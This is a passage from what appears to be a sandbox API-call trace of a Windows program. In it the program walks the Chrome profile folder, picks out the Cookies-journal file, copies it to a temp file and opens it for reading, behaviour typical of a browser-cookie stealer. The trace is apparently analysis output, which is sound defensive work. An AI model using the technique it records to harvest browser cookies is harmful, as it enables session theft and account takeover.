returned 1 [0163.095] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x394baf0 | out: hHeap=0x2dc0000) returned 1 [0163.095] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3949470 | out: hHeap=0x2dc0000) returned 1 [0163.095] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929dd8 | out: hHeap=0x2dc0000) returned 1 [0163.095] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a640 | out: hHeap=0x2dc0000) returned 1 [0163.095] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929c78 | out: hHeap=0x2dc0000) returned 1 [0163.095] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929c00 | out: hHeap=0x2dc0000) returned 1 [0163.095] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392aa08 | out: hHeap=0x2dc0000) returned 1 [0163.095] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x394ba50 | out: hHeap=0x2dc0000) returned 1 [0163.095] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929b78 | out: hHeap=0x2dc0000) returned 1 [0163.095] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x394b928 | out: hHeap=0x2dc0000) returned 1 [0163.095] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929b20 | out: hHeap=0x2dc0000) returned 1 [0163.095] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a780 | out: hHeap=0x2dc0000) returned 1 [0163.096] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a7f8 | out: hHeap=0x2dc0000) returned 1 [0163.096] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a960 | out: hHeap=0x2dc0000) returned 1 [0163.096] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a918 | out: hHeap=0x2dc0000) returned 1 [0163.096] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a8b8 | out: hHeap=0x2dc0000) returned 1 [0163.096] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x394b8a0 | out: hHeap=0x2dc0000) returned 1 [0163.096] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a798 | out: hHeap=0x2dc0000) returned 1 [0163.096] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x394b848 | out: hHeap=0x2dc0000) returned 1 [0163.096] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a828 | out: hHeap=0x2dc0000) returned 1 [0163.096] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a9a8 | out: hHeap=0x2dc0000) returned 1 [0163.096] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a7c8 | out: hHeap=0x2dc0000) returned 1 [0163.096] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a5e0 | out: hHeap=0x2dc0000) returned 1 [0163.096] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929ac0 | out: hHeap=0x2dc0000) returned 1 [0163.096] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929a88 | out: hHeap=0x2dc0000) returned 1 [0163.096] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a8d0 | out: hHeap=0x2dc0000) returned 1 [0163.096] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a900 | out: hHeap=0x2dc0000) returned 1 [0163.096] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a948 | out: hHeap=0x2dc0000) returned 1 [0163.096] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a930 | out: hHeap=0x2dc0000) returned 1 [0163.096] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a990 | out: hHeap=0x2dc0000) returned 1 [0163.096] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x39495c8 | out: hHeap=0x2dc0000) returned 1 [0163.096] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x394bb10 | out: hHeap=0x2dc0000) returned 1 [0163.097] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3949570 | out: hHeap=0x2dc0000) returned 1 [0163.097] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392aa20 | out: hHeap=0x2dc0000) returned 1 [0163.097] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x394b988 | out: hHeap=0x2dc0000) returned 1 [0163.097] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a840 | out: hHeap=0x2dc0000) returned 1 [0163.097] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929a00 | out: hHeap=0x2dc0000) returned 1 [0163.097] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x39299b0 | out: hHeap=0x2dc0000) returned 1 [0163.097] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x394b938 | out: hHeap=0x2dc0000) returned 1 [0163.097] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a858 | out: hHeap=0x2dc0000) returned 1 [0163.097] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a870 | out: hHeap=0x2dc0000) returned 1 [0163.097] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a888 | out: hHeap=0x2dc0000) returned 1 [0163.097] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a6e0 | out: hHeap=0x2dc0000) returned 1 [0163.097] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392bf70 | out: hHeap=0x2dc0000) returned 1 [0163.097] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x39297d0 | out: hHeap=0x2dc0000) returned 1 [0163.097] DeleteFileW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\6F29.tmp" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\6f29.tmp")) returned 1 [0163.098] VirtualQuery (in: lpAddress=0x925600, lpBuffer=0x2df2b4, dwLength=0x1c | out: lpBuffer=0x2df2b4*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.098] GetProcessHeap () returned 0x8e0000 [0163.098] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925600 | out: hHeap=0x8e0000) returned 1 [0163.098] VirtualQuery (in: lpAddress=0x925550, lpBuffer=0x2df314, dwLength=0x1c | out: lpBuffer=0x2df314*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.098] GetProcessHeap () returned 0x8e0000 [0163.098] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925550 | out: hHeap=0x8e0000) returned 1 [0163.098] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df358 | out: lpFindFileData=0x2df358*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x80d66840, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x80d66840, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x98d44890, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Cookies-journal", cAlternateFileName="COOKIE~1")) returned 1 [0163.098] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 75 [0163.099] lstrlenW (lpString="\\") returned 1 [0163.099] GetProcessHeap () returned 0x8e0000 [0163.099] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x9a) returned 0x9254a8 [0163.099] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default" [0163.099] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" [0163.099] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 76 [0163.099] lstrlenW (lpString="Cookies-journal") returned 15 [0163.099] GetProcessHeap () returned 0x8e0000 [0163.099] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb8) returned 0x925550 [0163.099] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" [0163.099] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\", lpString2="Cookies-journal" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies-journal") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies-journal" [0163.099] VirtualQuery (in: lpAddress=0x9254a8, lpBuffer=0x2df308, dwLength=0x1c | out: lpBuffer=0x2df308*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.099] GetProcessHeap () returned 0x8e0000 [0163.099] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9254a8 | out: hHeap=0x8e0000) returned 1 [0163.099] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies-journal", lpSrch="Cookies") returned="Cookies-journal" [0163.099] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies-journal") returned 91 [0163.099] RtlComputeCrc32 (PartialCrc=0x0, Buffer=0x925550, Length=0xb6) returned 0xb53ae8e3 [0163.099] GetProcessHeap () returned 0x8e0000 [0163.099] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x8) returned 0x8fc008 [0163.099] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\cookies-journal"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0163.099] CloseHandle (hObject=0x154) returned 1 [0163.099] GetProcessHeap () returned 0x8e0000 [0163.099] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x208) returned 0x925610 [0163.099] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x925610 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 0x25 [0163.100] GetTempFileNameW (in: lpPathName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\", lpPrefixString=0x0, uUnique=0x0, lpTempFileName=0x925610 | out: lpTempFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\6F78.tmp" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\6f78.tmp")) returned 0x6f78 [0163.102] DeleteFileW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\6F78.tmp" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\6f78.tmp")) returned 1 [0163.103] CopyFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\cookies-journal"), lpNewFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\6F78.tmp" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\6f78.tmp"), bFailIfExists=0) returned 1 [0163.104] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x28) returned 0x394b848 [0163.104] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0xb5) returned 0x394b878 [0163.104] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x1d8) returned 0x39297d0 [0163.104] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x43) returned 0x394b938 [0163.104] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x10) returned 0x392a888 [0163.104] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x43) returned 0x39299b0 [0163.104] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x10) returned 0x392a870 [0163.104] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x42) returned 0x3929a00 [0163.104] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x10) returned 0x392a858 [0163.104] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x2f) returned 0x3929a50 [0163.104] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x30) returned 0x3929a88 [0163.104] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x54) returned 0x3929ac0 [0163.104] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x822) returned 0x3929b20 [0163.104] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x3929a50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0163.104] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x5c) returned 0x392a350 [0163.104] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x3929a50, cbMultiByte=-1, lpWideCharStr=0x392a350, cchWideChar=46 | out: lpWideCharStr="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\6F78.tmp") returned 46 [0163.104] GetFullPathNameW (in: lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\6F78.tmp", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x2e [0163.104] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x62) returned 0x395b8c8 [0163.105] GetFullPathNameW (in: lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\6F78.tmp", nBufferLength=0x31, lpBuffer=0x395b8c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\6F78.tmp", lpFilePart=0x0) returned 0x2d [0163.105] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a350 | out: hHeap=0x2dc0000) returned 1 [0163.105] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\6F78.tmp", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 46 [0163.105] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x2e) returned 0x392a350 [0163.105] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a350) returned 0x2e [0163.105] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\6F78.tmp", cchWideChar=-1, lpMultiByteStr=0x392a350, cbMultiByte=46, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\6F78.tmp", lpUsedDefaultChar=0x0) returned 46 [0163.105] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x395b8c8) returned 0x62 [0163.105] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x395b8c8 | out: hHeap=0x2dc0000) returned 1 [0163.105] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a350) returned 0x2e [0163.105] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a350 | out: hHeap=0x2dc0000) returned 1 [0163.105] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x281) returned 0x392a350 [0163.105] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a350) returned 0x281 [0163.105] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929b20) returned 0x822 [0163.105] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929b20 | out: hHeap=0x2dc0000) returned 1 [0163.105] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x392a538, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0163.105] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x5c) returned 0x392a5e0 [0163.105] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a5e0) returned 0x5c [0163.105] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x392a538, cbMultiByte=-1, lpWideCharStr=0x392a5e0, cchWideChar=46 | out: lpWideCharStr="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\6F78.tmp") returned 46 [0163.105] GetFileAttributesExW (in: lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\6F78.tmp" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\6f78.tmp"), fInfoLevelId=0x0, lpFileInformation=0x2df0f4 | out: lpFileInformation=0x2df0f4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe4743ff0, ftCreationTime.dwHighDateTime=0x1d59514, ftLastAccessTime.dwLowDateTime=0xe4743ff0, ftLastAccessTime.dwHighDateTime=0x1d59514, ftLastWriteTime.dwLowDateTime=0x98d44890, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0163.105] CreateFileW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\6F78.tmp" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\6f78.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0163.105] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a5e0) returned 0x5c [0163.105] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a5e0 | out: hHeap=0x2dc0000) returned 1 [0163.105] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x1000) returned 0x394c1b8 [0163.106] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394c1b8) returned 0x1000 [0163.106] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394c1b8) returned 0x1000 [0163.106] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x74) returned 0x392a5e0 [0163.106] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a5e0) returned 0x74 [0163.106] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x400) returned 0x3929b20 [0163.106] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929b20) returned 0x400 [0163.106] ReadFile (in: hFile=0x160, lpBuffer=0x2df214, nNumberOfBytesToRead=0x64, lpNumberOfBytesRead=0x2df1bc, lpOverlapped=0x2df19c | out: lpBuffer=0x2df214, lpNumberOfBytesRead=0x2df1bc*=0x0, lpOverlapped=0x2df19c) returned 0 [0163.106] GetLastError () returned 0x26 [0163.106] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x54) returned 0x392a660 [0163.106] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a660) returned 0x54 [0163.106] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x54) returned 0x392a6c0 [0163.106] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a6c0) returned 0x54 [0163.106] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x22) returned 0x394b988 [0163.106] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394b988) returned 0x22 [0163.106] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x10) returned 0x392a840 [0163.107] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a840) returned 0x10 [0163.107] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x1d4c0) returned 0x392bf70 [0163.107] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392bf70) returned 0x1d4c0 [0163.107] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392bf70) returned 0x1d4c0 [0163.107] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929a50) returned 0x2f [0163.107] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929a50 | out: hHeap=0x2dc0000) returned 1 [0163.107] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394b878) returned 0xb5 [0163.107] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x394b878 | out: hHeap=0x2dc0000) returned 1 [0163.107] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394b848) returned 0x28 [0163.107] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x394b848 | out: hHeap=0x2dc0000) returned 1 [0163.107] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0xe) returned 0x392aa20 [0163.107] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392aa20) returned 0xe [0163.107] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x50) returned 0x394b848 [0163.107] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394b848) returned 0x50 [0163.107] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0xa) returned 0x392a990 [0163.107] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a990) returned 0xa [0163.107] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x80) returned 0x394b8a0 [0163.108] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394b8a0) returned 0x80 [0163.108] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0xa) returned 0x392a930 [0163.108] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a930) returned 0xa [0163.108] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0xe) returned 0x392a948 [0163.108] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a948) returned 0xe [0163.108] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0xd) returned 0x392a900 [0163.108] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a900) returned 0xd [0163.108] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x9) returned 0x392a8d0 [0163.108] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a8d0) returned 0x9 [0163.108] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x10) returned 0x392a7c8 [0163.108] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a7c8) returned 0x10 [0163.108] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0xe0) returned 0x3929f28 [0163.108] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929f28) returned 0xe0 [0163.108] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x3fc) returned 0x3949438 [0163.108] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3949438) returned 0x3fc [0163.108] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3949438) returned 0x3fc [0163.108] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3949438) returned 0x3fc [0163.108] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3949438 | out: hHeap=0x2dc0000) returned 1 [0163.108] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929f28) returned 0xe0 [0163.108] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929f28 | out: hHeap=0x2dc0000) returned 1 [0163.108] LockFileEx (in: hFile=0x160, dwFlags=0x3, dwReserved=0x0, nNumberOfBytesToLockLow=0x1, nNumberOfBytesToLockHigh=0x0, lpOverlapped=0x2de7a8 | out: lpOverlapped=0x2de7a8) returned 1 [0163.108] LockFileEx (in: hFile=0x160, dwFlags=0x1, dwReserved=0x0, nNumberOfBytesToLockLow=0x1fe, nNumberOfBytesToLockHigh=0x0, lpOverlapped=0x2de79c | out: lpOverlapped=0x2de79c) returned 1 [0163.108] UnlockFileEx (in: hFile=0x160, dwReserved=0x0, nNumberOfBytesToUnlockLow=0x1, nNumberOfBytesToUnlockHigh=0x0, lpOverlapped=0x2de7ac | out: lpOverlapped=0x2de7ac) returned 1 [0163.108] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x392a567, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0163.108] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x6c) returned 0x3929f28 [0163.108] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929f28) returned 0x6c [0163.109] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x392a567, cbMultiByte=-1, lpWideCharStr=0x3929f28, cchWideChar=54 | out: lpWideCharStr="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\6F78.tmp-journal") returned 54 [0163.109] GetFileAttributesExW (in: lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\6F78.tmp-journal" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\6f78.tmp-journal"), fInfoLevelId=0x0, lpFileInformation=0x2de7ac | out: lpFileInformation=0x2de7ac*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0163.109] GetLastError () returned 0x2 [0163.109] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929f28) returned 0x6c [0163.109] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929f28 | out: hHeap=0x2dc0000) returned 1 [0163.109] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x392a59d, cbMultiByte=-1, 